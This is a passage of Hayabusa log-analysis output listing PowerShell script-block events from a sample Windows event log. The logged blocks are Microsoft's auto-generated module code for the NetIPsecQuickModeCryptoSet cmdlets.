[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.659 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -con",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 